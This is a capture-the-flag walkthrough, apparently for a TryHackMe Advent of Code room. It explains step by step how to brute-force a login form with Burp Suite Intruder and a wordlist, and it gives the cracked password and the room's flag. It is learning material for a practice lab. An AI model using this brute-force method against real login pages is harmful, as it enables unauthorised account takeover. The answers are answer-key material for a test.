- Access the login form at http://MACHINE_IP
ANS: No answer needed
2. Configure Burp Suite & Firefox, submit some dummy credentials and intercept the request. Use intruder to attack the login form.
ANS: No answer needed
3. What valid password can you use to access the “santa” account?
ANS: cookie
EXPLANATION:
Step 1: Access the login form at http://MACHINE_IP ( eg: http://10.10.230.8) on web browser, as we know the username is santa, so add the username and add test as password .
Step 2: Intercept the Request and send it to Intruder and click the clear button and add $ to the “test”.
Step 3: Open this link (https://assets.tryhackme.com/additional/aoc2021/day4/passwords.txt) and copy and save this payload in a file.
Step 4: In Intruder, Go to Payload -> Payload Options -> Load the Payload file that has been saved. Click Start Attack.
Step 5: Check the length and the HTTP status of the payload. We found that cookie, HTTP status code: 302 and length is 2548
4. What is the flag in Santa’s itinerary?
ANS: THM{SANTA_DELIVERS}
EXPLANATION:
Step 1: Once we know the username is santa and password is cookie, we are able to login and see the flag.
*****************THANK YOU****KEEP LEARNING ******************
HOPE YOU GUYS, THIS WALKTHROUGH MIGHT HELP YOU,IF SO LIKE THE PAGE WILL BE MUCH APPRECIATED AND FOLLOW MY PROFILE FOR MORE WRITE-UPS
*******PEACE*****